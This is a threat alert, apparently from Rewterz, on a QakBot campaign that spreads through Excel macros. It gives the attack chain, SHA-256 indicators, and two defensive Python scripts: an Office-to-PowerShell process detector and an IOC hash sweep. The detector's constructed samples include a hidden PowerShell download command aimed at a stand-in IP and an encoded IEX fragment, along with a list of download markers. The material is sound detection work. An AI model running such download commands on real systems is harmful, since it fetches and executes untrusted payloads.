Severity
Medium
Analysis Summary
A large maldoc campaign delivering the QakBot (QBot) banking trojan has been detected. QakBot uses advanced techniques to evade detection and hamper manual analysis. QakBot attacks typically start with a malicious attachment to a phishing email, often a plain Microsoft Word or Excel document. This particular campaign uses an .xls file containing VBA macros. The macros launch a PowerShell script that downloads the QakBot payload from attacker-controlled URLs. The attackers use a common lure to get the victim to enable macros: when the target opens the file, it asks them to click "Enable Editing" and then "Enable Content" in order to view the document.
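The execution chain described above (Excel opens the lure, its macro spawns PowerShell, PowerShell fetches the payload) is easy to catch in endpoint telemetry as an Office process with a scripting host as its child. The following detection logic is an added example, not part of the Rewterz alert. It assumes Sysmon-style process-creation events (Event ID 1 field names `Image`, `ParentImage`, `CommandLine`) serialised one JSON object per line; the sample events, the TEST-NET address 203.0.113.10 and the base64 fragment are constructed for the example and are not indicators from this campaign.

```python
import json
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation records, not real telemetry.
# Event 0 is the benign parent; 1-3 show Office spawning a scripting host;
# 4 is PowerShell started by a service (not Office), so it must not fire.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xls'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://203.0.113.10/44.dat -OutFile C:\Users\Public\44.dat"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # constructed base64 fragment (UTF-16LE "IEX (New-Object"), not a real loader
     "CommandLine": r"powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Substrings (lower-cased) that indicate a download or an obfuscated command.
# Order matters only for the order in which matches are reported.
SUSPICIOUS_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                      "start-bitstransfer", "net.webclient", "-encodedcommand",
                      "-enc ", "http://", "https://")


def basename(path):
    """Lower-cased file name of a Windows path, e.g. '...\\EXCEL.EXE' -> 'excel.exe'."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return a finding for an Office app spawning a scripting host, else None.

    Severity is 'high' when the child's command line also carries a
    download/obfuscation marker (the pattern in this campaign), 'medium' otherwise.
    """
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "").lower()
    markers = [m for m in SUSPICIOUS_MARKERS if m in cmd]
    return {"parent": parent, "child": child,
            "severity": "high" if markers else "medium", "markers": markers}


def scan(lines):
    """Run classify() over JSON log lines; skip unparseable lines rather than abort."""
    findings = []
    for idx, line in enumerate(lines):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify(event)
        if finding:
            finding["line"] = idx
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f['line']}: {f['parent']} -> {f['child']} [{f['severity']}] {f['markers']}")
```

The parent/child check alone is noisy in environments where Office add-ins legitimately call cmd.exe, which is why the command-line markers are used to raise severity rather than as a precondition: a macro that spawns PowerShell with no network indicator is still worth a medium-severity alert.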
Impact
- Unauthorized Access
- Financial Theft
- Information Theft
Indicators of Compromise
SHA-256
- a9d6a4415b2357d00166efd1c761cb240922ef06c7138c9ce42e32587a0025c0
- 9ea0e87704b638607fc556ee4c2c302f4c73cdee77ff39f652a113aa7c99a22c
- df7b9a028c6061a6d3155cc4ee8cf24f3053beacf5419056bb90ae6f463521e6
- bdb85f576071e0ee13692a4385edab14ea88fddd321e635605b4ceabd5911360
- c0ebfab81fb04c8a136fd3fa18aed03160bb653308384f22216c3100268909e4
- b767e6c76ed8c061bb4328dae0f54c34013529fda62b2d94d93731e4007e2b47
- c485744426bf94d532b9e17b538e968247c8457d10aa6fe0ce50008fd00b4ef8
- f38b37376cc0d6681ff1640ad27b4442abe8a9d7116f2c344b536799584d3f74
- b797a754956e7699791fb88449cffcacd2432f86c307f3702e120294b6a58cb5
- b898a6aeaacfca8f1a729f94b83f4a2dd4106d19716c782db144afa641aaadb2
- 18033fd74500cd32eb7edbf955074467087554e6d5cce3cca8f422eb2e2fe198
- a5bc328591c50bf58533596432a8845c0958bbf9a6f373580854eb8032c09143
- c4a86707a2f09d097e24163631da988e9b04769fe5a60e1401210d37021a238d
- ee4c6e06181e96edac84934a66297590780e3934a51051fa4cef9885213b6584
- a5a60ae6d1ada77f63791f9191cd5e5c42964d7100795b2457ea67840e3e7c60
- 02b25b0759eb0ae458a41704fdf957035dbd7d1e610a8f77512ff08aec7da83f
- d0fd1a167e69af19410630ae357a9ad232dd400c2867a2548a6aa0c3e9717b21
- 0482b6ba956975564976d1941f2e921d269d08176a5bb6a19b0f5f334f30296e
- 099997029139bc1215e4317a688f7c14ffc330f969a4b4d8c251889d782188a7
- db50a9e8d4bce054571fd0dbf1e3dab1b6f139611483b72f899081d673aae626
Remediation
- Block the threat indicators at their respective controls.
- Search for the IOCs in your environment.
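One way to act on the "search for IOCs" step is a file-hash sweep: walk a directory tree, SHA-256 every file, and report any that match the indicator list above. The script below is an added example, not tooling from Rewterz; the indicator set is copied from this alert, and `demo()` builds a temporary directory with constructed files (one of which is deliberately added to the IOC set) so the sweep can be exercised offline.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# SHA-256 indicators as listed in this alert.
QAKBOT_SHA256 = {
    "a9d6a4415b2357d00166efd1c761cb240922ef06c7138c9ce42e32587a0025c0",
    "9ea0e87704b638607fc556ee4c2c302f4c73cdee77ff39f652a113aa7c99a22c",
    "df7b9a028c6061a6d3155cc4ee8cf24f3053beacf5419056bb90ae6f463521e6",
    "bdb85f576071e0ee13692a4385edab14ea88fddd321e635605b4ceabd5911360",
    "c0ebfab81fb04c8a136fd3fa18aed03160bb653308384f22216c3100268909e4",
    "b767e6c76ed8c061bb4328dae0f54c34013529fda62b2d94d93731e4007e2b47",
    "c485744426bf94d532b9e17b538e968247c8457d10aa6fe0ce50008fd00b4ef8",
    "f38b37376cc0d6681ff1640ad27b4442abe8a9d7116f2c344b536799584d3f74",
    "b797a754956e7699791fb88449cffcacd2432f86c307f3702e120294b6a58cb5",
    "b898a6aeaacfca8f1a729f94b83f4a2dd4106d19716c782db144afa641aaadb2",
    "18033fd74500cd32eb7edbf955074467087554e6d5cce3cca8f422eb2e2fe198",
    "a5bc328591c50bf58533596432a8845c0958bbf9a6f373580854eb8032c09143",
    "c4a86707a2f09d097e24163631da988e9b04769fe5a60e1401210d37021a238d",
    "ee4c6e06181e96edac84934a66297590780e3934a51051fa4cef9885213b6584",
    "a5a60ae6d1ada77f63791f9191cd5e5c42964d7100795b2457ea67840e3e7c60",
    "02b25b0759eb0ae458a41704fdf957035dbd7d1e610a8f77512ff08aec7da83f",
    "d0fd1a167e69af19410630ae357a9ad232dd400c2867a2548a6aa0c3e9717b21",
    "0482b6ba956975564976d1941f2e921d269d08176a5bb6a19b0f5f334f30296e",
    "099997029139bc1215e4317a688f7c14ffc330f969a4b4d8c251889d782188a7",
    "db50a9e8d4bce054571fd0dbf1e3dab1b6f139611483b72f899081d673aae626",
}


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 in 1 MiB chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, iocs, suffixes=None):
    """Walk `root` and return [(path, sha256)] for every file whose hash is in `iocs`.

    `suffixes` (e.g. {'.xls', '.dll'}) optionally restricts which files are hashed.
    Unreadable or vanished files are skipped so one bad entry does not abort the sweep.
    """
    iocs = {h.lower() for h in iocs}
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if suffixes and p.suffix.lower() not in suffixes:
                continue
            try:
                digest = sha256_file(p)
            except OSError:
                continue
            if digest in iocs:
                hits.append((str(p), digest))
    return hits


def demo():
    """Constructed fixture: a temp tree where one file's hash is added to the IOC set.

    Returns the base names of matched files, so callers can check the sweep worked.
    """
    with tempfile.TemporaryDirectory() as tmp:
        bad = Path(tmp) / "invoice.xls"
        bad.write_bytes(b"constructed sample, not real malware")
        good = Path(tmp) / "notes.txt"
        good.write_bytes(b"benign content")
        iocs = QAKBOT_SHA256 | {sha256_file(bad)}  # hypothetical extra indicator
        return [Path(p).name for p, _ in sweep(tmp, iocs)]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for path, digest in (sweep(target, QAKBOT_SHA256) if target else []):
        print(f"MATCH {digest} {path}")
    print("demo matches:", demo())
```

Hash matching only finds the exact samples listed, so it belongs alongside the process-level detection rather than replacing it: a repacked payload will have a new hash but still arrives via the same Excel-to-PowerShell chain.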